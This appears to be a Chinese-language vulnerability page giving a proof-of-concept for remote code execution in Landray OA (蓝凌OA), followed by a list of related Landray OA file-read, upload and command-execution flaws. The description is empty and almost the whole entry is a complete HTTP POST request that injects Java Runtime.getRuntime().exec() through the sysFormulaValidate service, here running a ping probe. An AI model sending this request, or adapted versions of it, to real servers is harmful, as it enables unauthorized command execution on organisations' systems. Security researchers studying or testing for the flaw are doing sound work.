蓝凌OA /dataxml.jsp 路径 sysFormulaValidate 存在远程代码执行漏洞

漏洞描述

PoC代码

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 141
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36

var={"body":{"file":"/tic/core/resource/js/erp_data.jsp"}}&erpServcieName=sysFormulaValidate&script=Runtime.getRuntime().exec("ping -nc 1 ");

相关漏洞推荐

• 蓝凌OA erp_data.jsp存在远程命令执行漏洞
• 蓝凌OA sysUiExtend.do 存在任意文件上传漏洞
• 蓝凌OA /sys/ui/sys_ui_component/sysUiComponent.do 命令执行漏洞
• POC landray-oa-sysuicomponent-fileupload: 蓝凌 OA 子部件文件上传
• 蓝凌OA /ekp/data/sys-common/dataxml.tmpl 命令执行漏洞
• 蓝凌OA /sys/webservice/elecPsealUseWebService 文件读取漏洞
• 蓝凌OA /sys/webservice/sysNotifyTodoWebServiceEkpj 文件读取漏洞
• 蓝凌OA /sys/webservice/loginWebserviceService 文件读取漏洞
• 蓝凌OA /sys/webservice/kmImeetingResWebService 文件读取漏洞
• 蓝凌OA /sys/webservice/wechatWebserviceService 文件读取漏洞
• 蓝凌OA lbpmFlowLogGetWebService 任意文件读取漏洞
• 蓝凌OA fsscCtripBusinessOrderWebService 任意文件读取漏洞
• 蓝凌OA wechatWebserviceService 任意文件读取漏洞